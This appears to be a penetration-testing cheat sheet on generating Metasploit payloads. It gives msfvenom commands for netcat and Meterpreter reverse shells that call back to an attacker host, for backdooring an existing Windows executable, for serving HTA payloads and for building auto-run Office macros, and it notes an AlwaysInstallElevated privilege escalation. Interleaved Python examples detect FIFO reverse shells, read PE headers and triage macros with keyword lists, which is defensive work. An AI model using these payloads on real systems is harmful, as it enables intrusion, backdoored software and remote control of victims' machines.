msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts. For example:
```
# Use Metasploit to generate the code for a remote shell:
msfvenom -p cmd/unix/reverse_netcat \
    lhost=$LOCAL_IP lport=$LOCAL_PORT

# Spin up a listener using netcat:
nc -lvp $LOCAL_PORT
```
mkfifo /tmp/qdsrgu creates a named pipe at /tmp/qdsrgu.
We then spin up a netcat instance directed at our local machine (nc $LOCAL_IP $LOCAL_PORT), direct the contents of the pipe into netcat’s STDIN (0< /tmp/qdsrgu), pipe the output of netcat to a shell we know probably exists (| /bin/sh), and finally redirect both STDOUT and STDERR back into the named pipe (> /tmp/qdsrgu 2>&1).
On the local machine, nc -lvp $LOCAL_PORT listens for the incoming netcat connection from the remote. Anything we type on STDIN here gets sent to the remote and piped to /bin/sh there. The output of /bin/sh is then sent to the named pipe, which dumps into (the remote) netcat, which then sends the data to the local machine where it ends up on STDOUT.
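The mechanics above are also what a defender looks for in process-execution telemetry: a single command line that creates a FIFO, hands it to netcat on stdin, pipes netcat into a shell, and redirects the shell's output back into the same FIFO. The following detector is an added example, not code from the original page; the log lines are constructed, and the field names and regexes are my own assumptions about what an auditd/EDR export might look like.

```python
import re

# Constructed sample command lines (not real telemetry): one benign use of
# mkfifo, one matching the named-pipe netcat pattern described above,
# and two unrelated commands.
SAMPLE_CMDLINES = [
    "mkfifo /tmp/build.fifo && tar cf - src > /tmp/build.fifo",
    "mkfifo /tmp/qdsrgu; nc 10.0.0.5 4444 0</tmp/qdsrgu | /bin/sh >/tmp/qdsrgu 2>&1; rm /tmp/qdsrgu",
    "nc -zv mail.example.com 25",
    "ls -la /tmp",
]

# mkfifo <path>; the path stops at whitespace or a shell operator
FIFO_RE = re.compile(r"\bmkfifo\s+([^\s;&|]+)")
# any netcat flavour invoked somewhere on the line
NC_RE = re.compile(r"\b(nc|ncat|netcat)\b")
# something is piped into sh/bash
SHELL_RE = re.compile(r"\|\s*(/bin/)?(ba)?sh\b")


def is_fifo_reverse_shell(cmdline: str) -> bool:
    """True when one command line wires a named pipe through netcat and a shell.

    All four conditions must hold: a FIFO is created, netcat runs, output is
    piped into a shell, and the FIFO is used both as stdin (0< or <) and as a
    stdout redirection target (>). A FIFO used only for a build pipeline or a
    lone netcat port check does not match.
    """
    m = FIFO_RE.search(cmdline)
    if not m:
        return False
    fifo = re.escape(m.group(1))
    if not NC_RE.search(cmdline) or not SHELL_RE.search(cmdline):
        return False
    reads_fifo = re.search(r"0?<\s*" + fifo, cmdline) is not None
    writes_fifo = re.search(r">\s*" + fifo, cmdline) is not None
    return reads_fifo and writes_fifo


def scan(cmdlines):
    """Return the subset of command lines that match the pattern."""
    return [c for c in cmdlines if is_fifo_reverse_shell(c)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print("ALERT fifo reverse shell:", hit)
```

Matching on all four components rather than on `mkfifo` or `nc` alone keeps the false-positive rate low on build hosts, where FIFOs and netcat port checks are ordinary; the pipe-name check also ties the read and write redirections to the same FIFO, which is the part of the pattern that plain keyword matching misses.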
Use --list formats to see available encoding formats. In general, shell scripts can always be produced by specifying -f raw and an output file with the appropriate extension.
```
# 64-bit Windows executable meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    -f exe -o ${NAME}.exe

# 64-bit Windows SERVICE executable (note that these require
# additional API calls to work, beyond what `-f exe` provides)
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    -f exe-service -o ${NAME}.exe

# Add a meterpreter backdoor to an existing executable
msfvenom -a x64 --platform windows -x $ORIGINAL_EXE -k \
    -p windows/meterpreter/reverse_tcp \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    -b "\x00" -f exe -o $BACKDOORED_EXE
```
Note that by default msfvenom produces 64-bit executables when using -f exe. This doesn’t work, however, if you’re trying to replace a program in Program Files (x86). In this case, you’ll need to explicitly instruct msfvenom to encode a 32-bit binary using -e x86/shikata_ga_nai.
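Whether a produced or backdoored binary is 32-bit or 64-bit is something you should verify from the file itself rather than from the flags you remember passing; the same check is what an analyst runs on a suspicious executable found in Program Files (x86). The PE header reader below is an added example, not code from the page or from Metasploit; it reads the `Machine` field of `IMAGE_FILE_HEADER` and the `Magic` field of the optional header and reports whether they agree. The header builder only constructs a minimal synthetic MZ/PE header for offline testing, not a working executable.

```python
import struct

# IMAGE_FILE_HEADER.Machine values and optional-header Magic values (Microsoft PE spec)
IMAGE_FILE_MACHINE = {0x014C: "x86", 0x8664: "x64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def pe_architecture(data: bytes) -> dict:
    """Parse the MZ/PE headers of an executable and report its architecture.

    Returns the Machine name, the optional-header format, whether the binary is
    64-bit, and whether Machine and Magic are consistent with each other (an
    x86 Machine with a PE32+ optional header, or vice versa, is a red flag).
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew at DOS header offset 0x3C points at the 'PE\0\0' signature
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER follows the signature; Machine is its first WORD
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    # IMAGE_FILE_HEADER is 20 bytes; the optional header's Magic is its first WORD
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    machine_name = IMAGE_FILE_MACHINE.get(machine, hex(machine))
    fmt = OPTIONAL_MAGIC.get(magic, hex(magic))
    is_64 = machine == 0x8664
    consistent = (machine, magic) in {(0x014C, 0x10B), (0x8664, 0x20B)}
    return {"machine": machine_name, "format": fmt,
            "is_64bit": is_64, "consistent": consistent}


def build_minimal_header(machine: int, magic: int) -> bytes:
    """Construct a synthetic 96-byte MZ/PE header for testing (not runnable code)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_of_optional = 0xE0 if magic == 0x10B else 0xF0
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (IMAGE_FILE_EXECUTABLE_IMAGE)
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, size_of_optional, 0x0002)
    opt_hdr = struct.pack("<H", magic) + b"\0" * 30
    return dos + b"PE\0\0" + file_hdr + opt_hdr


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(pe_architecture(f.read(4096)))
    else:
        print(pe_architecture(build_minimal_header(0x8664, 0x20B)))
```

Run it against a real file with `python pe_arch.py some.exe` (the script name is an assumption); only the first few kilobytes are needed since both headers sit at the start of the image.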
MSI installers
If AlwaysInstallElevated is set to 1 under both of the following registry keys, then MSI installers will run as SYSTEM.
Catch the connection with the standard nc -lvp $ATTACKER_PORT netcat listener.
Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server. Critical variables to set:
LHOST — the host IP address to connect back to
LPORT — the port to connect back to
SRVHOST — the host IP address to serve the malicious file on
payload — the Metasploit payload to use
In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (e.g., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a meterpreter shell, rather than just a plain reverse shell!
Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.
Metasploit’s msfvenom can create VBA payloads, as one might expect. Despite WSH not wanting to pop cmd.exe or other executables (outside of calc.exe), a meterpreter reverse shell actually works! (That said, it will die when Word does, and thus needs to be migrated to a new process ASAP…)
To work, the VBA output must be copied into a Microsoft Office document as a macro. By default msfvenom will use the Workbook_Open() function; this is suitable for Excel, but must be changed to Document_Open() for Word.
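The flip side of the Workbook_Open()/Document_Open() point is that those auto-execute procedure names are exactly what macro triage keys on. The scanner below is an added example, not code from the page or from Metasploit; it takes extracted VBA source text (for instance what a tool like oletools' olevba prints), lists any auto-execute entry points together with the application they fire in, and flags a small set of calls that usually warrant a closer look. Both macro samples are constructed for the example, and the keyword lists are my own starting set, not an exhaustive signature.

```python
import re

# Constructed sample macro source, not extracted from any real document.
SAMPLE_EXCEL_MACRO = """\
Private Sub Workbook_Open()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "calc.exe", 0
End Sub
"""

SAMPLE_BENIGN_MACRO = """\
Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
"""

# Procedure names that Office runs automatically, and where they fire
AUTO_EXEC_PROCS = {
    "workbook_open": "Excel",
    "auto_open": "Excel",
    "document_open": "Word",
    "autoopen": "Word",
    "autoexec": "Word",
}

# Calls that commonly appear when a macro is used to launch something
SUSPICIOUS_CALLS = ["shell", "createobject", "wscript.shell", "powershell",
                    "urldownloadtofile", "environ"]

PROC_RE = re.compile(
    r"^\s*(?:private\s+|public\s+)?(?:sub|function)\s+([a-z_][a-z0-9_]*)",
    re.IGNORECASE | re.MULTILINE,
)


def auto_exec_entry_points(source: str):
    """Return [(procedure_name, application)] for every auto-execute procedure."""
    names = [n.lower() for n in PROC_RE.findall(source)]
    return [(n, AUTO_EXEC_PROCS[n]) for n in names if n in AUTO_EXEC_PROCS]


def suspicious_calls(source: str):
    """Return the suspicious keywords present, in list order."""
    lowered = source.lower()
    return [c for c in SUSPICIOUS_CALLS if c in lowered]


def analyse_macro(source: str) -> dict:
    """Combine both checks into a triage verdict.

    'review' means the macro both runs automatically and contains a flagged
    call; 'auto-exec only' or 'suspicious only' means one of the two;
    'clean' means neither was found.
    """
    entries = auto_exec_entry_points(source)
    hits = suspicious_calls(source)
    if entries and hits:
        verdict = "review"
    elif entries:
        verdict = "auto-exec only"
    elif hits:
        verdict = "suspicious only"
    else:
        verdict = "clean"
    return {"auto_exec": entries, "suspicious": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("excel", SAMPLE_EXCEL_MACRO), ("benign", SAMPLE_BENIGN_MACRO)):
        print(label, analyse_macro(src))
```

Reporting the application alongside the entry point matters in practice: a Workbook_Open() procedure sitting inside a .docm is inert, while the same code under Document_Open() runs as soon as the document is opened, so the pairing tells the analyst whether the sample would actually have fired.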